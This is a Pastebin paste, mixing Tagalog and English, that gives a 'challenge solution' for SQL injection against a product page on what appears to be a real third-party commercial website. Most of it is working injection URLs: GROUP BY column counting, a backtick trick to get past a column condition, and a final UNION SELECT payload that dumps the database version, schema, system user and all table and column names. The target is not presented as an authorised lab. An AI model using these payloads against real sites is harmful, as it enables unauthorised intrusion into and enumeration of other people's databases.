API tools faq
paste
Advertisement
silentangelph

SA - EZ SQLi Challenge Solution (Column Condition Bypass)

silentangelph
Jun 2nd, 2016
535
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.62 KB | None | 0 0
raw download clone embed print report
  1. SA - EZ SQLi Challenge {SOLUTION}
  2.  
  3. CHALLENGE:
  4. Site: http://comforthomesolution.com/product.php?c=11
  5. Level: ez as fuck (totoo na to HAHAHAHA but medj tricky hihi)
  6.  
  7. Tasks:
  8. -Union based only (don't use other fucking methods)
  9. -Print your name, version, db, user, tables and columns
  10.  
  11. Rules: (wala na muna masyado hihi )
  12. -Thou shall not use version(), @@version in printing the version
  13. -Thou shall not use user(), @@user, current_user in printing the user
  14. -Thou shall not use database() in printing the database
  15. -PM me your query to be in the solvers list
  16.  
  17.  
  18. SOLUTION:
  19. First of all kelangan muna natin iclose yung query gamit ang ")" para hindi maka-apekto sa ating query.
  20.  
  21. We can easily get the number of columns using the group_by function :)
  22.  
  23. http://comforthomesolution.com/product.php?c=11)+group+by+1--+ <- no error
  24. http://comforthomesolution.com/product.php?c=11)+group+by+2--+ <- no error
  25. http://comforthomesolution.com/product.php?c=11)+group+by+3--+ <- no error
  26. http://comforthomesolution.com/product.php?c=11)+group+by+4--+ <- no error
  27. http://comforthomesolution.com/product.php?c=11)+group+by+5--+ <- no error
  28. http://comforthomesolution.com/product.php?c=11)+group+by+6--+ <- no error
  29. http://comforthomesolution.com/product.php?c=11)+group+by+7--+ <- no error
  30. http://comforthomesolution.com/product.php?c=11)+group+by+8--+ <- no error
  31. http://comforthomesolution.com/product.php?c=11)+group+by+9--+ < fuck bro atlast error!!!
  32.  
  33. Okay, so ngayon alam na natin na may 8 columns lang. So let's try it boiz!
  34.  
  35. http://comforthomesolution.com/product.php?c=.11)+union+select+1,2,3,4,5,6,7,8--+
  36.  
  37. Wtf anyare bat ganon? Hindi lumabas fuck this shit :( ((mostly ayan yung naencounter niyong error right? Dahil yan sa sql statements na naka-loob sa ating iniinject na site. (column condition shits)
  38.  
  39. To bypass it at para iignore yung c_cat.id etc ay gagamitin natin ang banal na backtick "`" or pag nakaurl-encode siya "%60"
  40.  
  41. Now let's try it!
  42.  
  43. http://comforthomesolution.com/product.php?c=.11)+union+select+1,2,3,4,5,6,7,8`--+
  44.  
  45. Ehmerged lumabas na yung vuln columns woo!!! Pwede na natin idios ang site so this will be the final query.
  46.  
  47. http://comforthomesolution.com/product.php?c=11) union select 1,concat(@@global.version,0x3a3a53696c656e74416e67656c3c62723e44617461626173653a3a,schema(),0x3c62723e557365723a3a,system_user(),concat(@c:=0x00,if((select+count(*)+from+information_schema.columns+where+table_schema=database()+AND+@c:=concat(@c,0x3c62723e,table_name,0x2e,column_name)),0x00,0x00),@c)),3,4,5,6,7,8`
  48.  
  49. Hope you learned something :))
  50.  
  51. Btw, I'm planning to create a youtube channel too in the near future so stay tuned folks!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!